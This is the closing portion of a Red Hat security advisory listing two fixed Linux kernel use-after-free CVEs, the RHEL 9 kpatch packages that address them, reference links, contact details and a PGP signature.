5. Bugs fixed (https://bugzilla.redhat.com/):

2192589 - CVE-2023-2235 kernel: use-after-free vulnerability in the perf_group_detach function of the Linux Kernel Performance Events  
2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
kpatch-patch-5_14_0-284_11_1-1-1.el9_2.src.rpm

ppc64le:  
kpatch-patch-5_14_0-284_11_1-1-1.el9_2.ppc64le.rpm  
kpatch-patch-5_14_0-284_11_1-debuginfo-1-1.el9_2.ppc64le.rpm  
kpatch-patch-5_14_0-284_11_1-debugsource-1-1.el9_2.ppc64le.rpm

x86_64:  
kpatch-patch-5_14_0-284_11_1-1-1.el9_2.x86_64.rpm  
kpatch-patch-5_14_0-284_11_1-debuginfo-1-1.el9_2.x86_64.rpm  
kpatch-patch-5_14_0-284_11_1-debugsource-1-1.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2235  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJLxkNzjgjWX9erEAQgTuBAAk6uzd8M0tIWTMcghAGIEgsHUzr+ujyEm  
/Ej0Vheq/cwayF/CxogxuNC/UhTfRMtaGmteF3IWiSOSTo9HzQ07C6sQCz+SE8Q5  
p9+cY6aw8PJz2qhgsWNHudMrrDCPgTj1DrLYtlXLtZEEyd62GToXF5P2bc04EYLM  
PIsz65fCVe+1sxSAMIGS0P3UtO953tM+5U19ONQvFjCz4k01wv4nu2VFqzGTQ/iL  
vcT0DOOU1maye46xv4qJADMlM7Nk/1QodXA28L2PTXB+i+9J6usnxRZhNYqjMd9l  
jY0WqqNkqxOtP3bKz9eSz7kJm74VKSRJHa7HQtxg7y+dTyd60SgIMUQh6vXGSoAy  
pyezdcAyvVXFMtv5qhj3TQB3moBmcVGPt1+5MzPzUa2FZrM5IKNKYDjqBvjQgBFg  
mi55E1Dv99FmYtmV46pa4lvLkNVb5T1R3Q3utnCxzypaEeCXm3qege+fy9OOoTwN  
AIeheVEb2tERoe0t7lrnI13xDcnQqaV6vK1yNYvxInYhft7t/GUnFz5UwwZmls1Y  
EtU3VlSSvmg+YzV13Cz7AxEnMsNiWnj3WbuWRSNK4770mafapNF8fY2LK+0ryB3D  
L04SVEVd8lqiIkMSmzKqaWNDjd4etWHlol/iBPNAwnGKGwPXYM0pWg6A8E/rQj2X  
/aFUZGlr82w=  
=zd8j  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm